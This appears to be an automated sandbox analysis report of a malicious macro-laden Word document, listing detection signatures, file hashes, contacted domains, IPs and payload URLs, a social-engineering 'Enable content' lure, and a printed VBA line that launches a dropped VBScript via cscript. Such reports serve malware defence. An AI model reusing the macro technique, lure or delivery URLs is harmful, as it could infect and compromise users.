Windows Analysis Report sample.doc.vir

Overview

General Information

Sample Name:	sample.doc.vir (renamed file extension from vir to doc)
Analysis ID:	528758
MD5:	6be56f977b6692fb6ce5f94e110664e3
SHA1:	f4d5ce35c656e0f156a2ced453a964faabef09fb
SHA256:	ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
Tags:	docxvir
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected MalDoc

Multi AV Scanner detection for submitted file

Sigma detected: Office product drops script at suspicious location

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Yara detected Powershell download and execute

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document contains an embedded VBA macro which may execute processes

Document contains OLE streams with names of living off the land binaries

Sigma detected: Change PowerShell Policies to a Unsecure Level

Document contains an embedded VBA with base64 encoded strings

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded macro with GUI obfuscation

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Document has an unknown application name

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Document contains an embedded VBA macro which executes code when the document is opened / closed

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Enables debug privileges

Document contains no OLE stream with summary information

Potential document exploit detected (unknown TCP traffic)

Contains functionality to detect virtual machines (SLDT)

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: sample.doc.doc	Virustotal: Detection: 50%			Perma Link
Source: sample.doc.doc	ReversingLabs: Detection: 60%

Antivirus / Scanner detection for submitted sample

Source: sample.doc.doc

Avira: detected

Multi AV Scanner detection for domain / URL

Source: ghapan.com	Virustotal: Detection: 8%	Perma Link
Source: yoowi.net	Virustotal: Detection: 8%	Perma Link
Source: chaturanga.groopy.com	Virustotal: Detection: 8%	Perma Link
Source: gruasingenieria.pe	Virustotal: Detection: 7%	Perma Link

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cscript.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: ghapan.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

Networking:

Yara detected MalDoc

Source: Yara match	File source: sample.doc.doc, type: SAMPLE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ASMALLORANGE1US ASMALLORANGE1US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
Source: global traffic	HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 136.243.74.161 136.243.74.161
Source: Joe Sandbox View	IP Address: 143.95.80.83 143.95.80.83
Source: Joe Sandbox View	IP Address: 192.185.17.114 192.185.17.114
Source: Joe Sandbox View	IP Address: 210.211.111.87 210.211.111.87

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:39:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 06:20:01 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/html

Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000001.00000002.474013786.0000000001D00000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000011.00000002.490483837.0000000001B20000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/7S
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmlPE
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.comp
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.c
Source: powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3o
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/0
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.html
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.htmlPE
Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/cgi-sys/suspendedpage.cgi
Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.comp
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LU
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS1N
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.htmlPE
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4E
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4Ej/
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.html
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.htmlPE
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.ne
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwd
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/1
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ghapan.com

Source: global traffic	HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
Source: global traffic	HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" 0 Page, I of I Words
Source: Screenshot number: 4	Screenshot OCR: Enable content" 0 Page, I of I Words: 0 N@m 13 ;a 10096 G) FI G) ,, . I lm=lk E ' 0
Source: Screenshot number: 8	Screenshot OCR: Enable content" Ru 71)11 qllnn\|\| n$m RunDLL m" RunDLL ,0 There was a problem starting C:\Progr
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 0	Screenshot OCR: Enable content"
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 1	Screenshot OCR: Enable content"
Source: Screenshot number: 12	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" RunDLL \|~\| ,:Q, There was
Source: Screenshot number: 12	Screenshot OCR: Enable content" RunDLL \|~\| ,:Q, There was a problem starting C:\ProgramOata\www1.dll " C:\Program

Document contains an embedded VBA macro which may execute processes

Source: sample.doc.doc	OLE, VBA macro line: h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function eFile, API IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0")	Name: eFile
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Document contains OLE streams with names of living off the land binaries

Source: sample.doc.doc	Stream path 'Macros/deutsche/o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM...................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{\|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE\|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
